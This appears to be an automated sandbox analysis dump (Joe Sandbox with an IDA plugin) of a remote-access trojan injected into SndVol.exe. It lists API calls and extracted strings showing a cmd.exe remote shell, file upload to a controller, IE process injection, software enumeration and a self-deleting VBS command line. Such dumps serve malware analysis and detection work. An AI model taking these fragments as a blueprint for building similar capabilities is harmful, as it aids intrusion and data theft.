                                                                  • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Write$Create
                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                  • API String ID: 1602526932-4212202414
                                                                  • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                  • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                                                  • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                  • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 3899193279-0
                                                                  • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                                  • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                                                  • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                                  • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                                                  APIs
                                                                  • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                  • _free.LIBCMT ref: 0044E4DF
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 0044E501
                                                                  • _free.LIBCMT ref: 0044E516
                                                                  • _free.LIBCMT ref: 0044E521
                                                                  • _free.LIBCMT ref: 0044E543
                                                                  • _free.LIBCMT ref: 0044E556
                                                                  • _free.LIBCMT ref: 0044E564
                                                                  • _free.LIBCMT ref: 0044E56F
                                                                  • _free.LIBCMT ref: 0044E5A7
                                                                  • _free.LIBCMT ref: 0044E5AE
                                                                  • _free.LIBCMT ref: 0044E5CB
                                                                  • _free.LIBCMT ref: 0044E5E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                  • String ID: pF
                                                                  • API String ID: 161543041-2973420481
                                                                  • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                  • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                                                  • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                  • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                  • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                  • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                  • API String ID: 2490988753-744132762
                                                                  • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                  • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                                                  • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                  • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                  • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                  • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                  • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                  • String ID: /stext "$$.F$@#G$@#G
                                                                  • API String ID: 1223786279-2596709126
                                                                  • Opcode ID: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                  • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                                                  • Opcode Fuzzy Hash: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                  • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: pF
                                                                  • API String ID: 269201875-2973420481
                                                                  • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                  • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                                                  • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                  • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: pF
                                                                  • API String ID: 269201875-2973420481
                                                                  • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                  • Instruction ID: 253590fffb765f5657370ccd4582a69b9563314060cce58500c90cd50ba12f5a
                                                                  • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                  • Instruction Fuzzy Hash: 92C16272E00214BFEB20DAA8CD82FEE77FCAB49705F050175FA45EB285E670B9419764
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 048EC61A
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 048EC633
                                                                  • _wcslen.LIBCMT ref: 048EC700
                                                                  • _wcslen.LIBCMT ref: 048EC7BD
                                                                  • ShellExecuteW.SHELL32(00000000,004630AC,00000000,00469654,00469654,00000000), ref: 048EC9C2
                                                                  • ExitProcess.KERNEL32 ref: 048EC9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _wcslen$CreateDirectoryExecuteExitProcessShell
                                                                  • String ID: $.F$05ou`ou$6$C:\Windows\SysWOW64\SndVol.exe$t<F$!G$!G
                                                                  • API String ID: 1288302323-737319927
                                                                  • Opcode ID: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                                                  • Instruction ID: 48501c6769fc7ccce4b511fbdc3ace76db36a552364ba735025d7abc7871a624
                                                                  • Opcode Fuzzy Hash: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                                                  • Instruction Fuzzy Hash: 1091A4216083815BE318FB3ADC50EBF77989F92648F104E6EE946D3091EFA4B909C657
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                  • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                  • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                  • API String ID: 193334293-3226144251
                                                                  • Opcode ID: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
                                                                  • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                                                  • Opcode Fuzzy Hash: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
                                                                  • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnumOpen
                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                  • API String ID: 1332880857-3714951968
                                                                  • Opcode ID: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                  • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                                                  • Opcode Fuzzy Hash: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                  • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                  • GetCursorPos.USER32(?), ref: 0041B39E
                                                                  • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                  • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                  • ExitProcess.KERNEL32 ref: 0041B41A
                                                                  • CreatePopupMenu.USER32 ref: 0041B420
                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                  • String ID: Close
                                                                  • API String ID: 1657328048-3535843008
                                                                  • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                  • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                                                  • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                  • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$Info
                                                                  • String ID:
                                                                  • API String ID: 2509303402-0
                                                                  • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                                  • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                                                  • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                                  • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                  • __aulldiv.LIBCMT ref: 00407D89
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                  • API String ID: 3086580692-2596673759
                                                                  • Opcode ID: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
                                                                  • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                                                  • Opcode Fuzzy Hash: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
                                                                  • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                                                  APIs
                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                  • ExitProcess.KERNEL32 ref: 0040C57D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                  • API String ID: 1913171305-2600661426
                                                                  • Opcode ID: 0fed04b8f83d723dc58248fa29da0096c2407ac2a725f0ac335c0f5183f427b2
                                                                  • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                                                  • Opcode Fuzzy Hash: 0fed04b8f83d723dc58248fa29da0096c2407ac2a725f0ac335c0f5183f427b2
                                                                  • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 048E645E
                                                                    • Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE
                                                                  • __Init_thread_footer.LIBCMT ref: 048E649B
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 048E65B7
                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 048E660F
                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 048E6634
                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 048E6661
                                                                    • Part of subcall function 049132BD: __onexit.LIBCMT ref: 049132C3
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 048E675C
                                                                  • Sleep.KERNEL32(00000064,00000062,00463050), ref: 048E6776
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 048E678F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileInit_thread_footerProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                                                                  • String ID: cmd.exe
                                                                  • API String ID: 3407654705-723907552
                                                                  • Opcode ID: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
                                                                  • Instruction ID: 86a2e5b2a6398f31fbb4ab132760b89abe9ee0e93ea6933804199b0c547ace2b
                                                                  • Opcode Fuzzy Hash: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
                                                                  • Instruction Fuzzy Hash: 15910A71600208BFE710BF69EC4097E3758EB42709F40497DF549E72A2EBA4BE48975B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 65535$udp
                                                                  • API String ID: 0-1267037602
                                                                  • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                  • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                                                  • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                  • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                  • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                  • __dosmaperr.LIBCMT ref: 00438646
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                  • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                  • __dosmaperr.LIBCMT ref: 00438683
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                  • __dosmaperr.LIBCMT ref: 004386D7
                                                                  • _free.LIBCMT ref: 004386E3
                                                                  • _free.LIBCMT ref: 004386EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                  • String ID:
                                                                  • API String ID: 2441525078-0
                                                                  • Opcode ID: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
                                                                  • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                                                  • Opcode Fuzzy Hash: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
                                                                  • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: pF$tF
                                                                  • API String ID: 269201875-2954683558
                                                                  • Opcode ID: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
                                                                  • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                                                  • Opcode Fuzzy Hash: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
                                                                  • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                                                  APIs
                                                                  • Sleep.KERNEL32(00001388), ref: 048EA4D0
                                                                    • Part of subcall function 048EA405: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,048EA4DD), ref: 048EA43B
                                                                    • Part of subcall function 048EA405: GetFileSize.KERNEL32(00000000,00000000,?,?,?,048EA4DD), ref: 048EA44A
                                                                    • Part of subcall function 048EA405: Sleep.KERNEL32(00002710,?,?,?,048EA4DD), ref: 048EA477
                                                                    • Part of subcall function 048EA405: CloseHandle.KERNEL32(00000000,?,?,?,048EA4DD), ref: 048EA47E
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 048EA50C
                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 048EA51D
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 048EA534
                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 048EA5AE
                                                                    • Part of subcall function 048FAFA7: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,048E4EA7,00462E24), ref: 048FAFC0
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 048EA6B7
                                                                  Strings
                                                                  Memory Dump Source
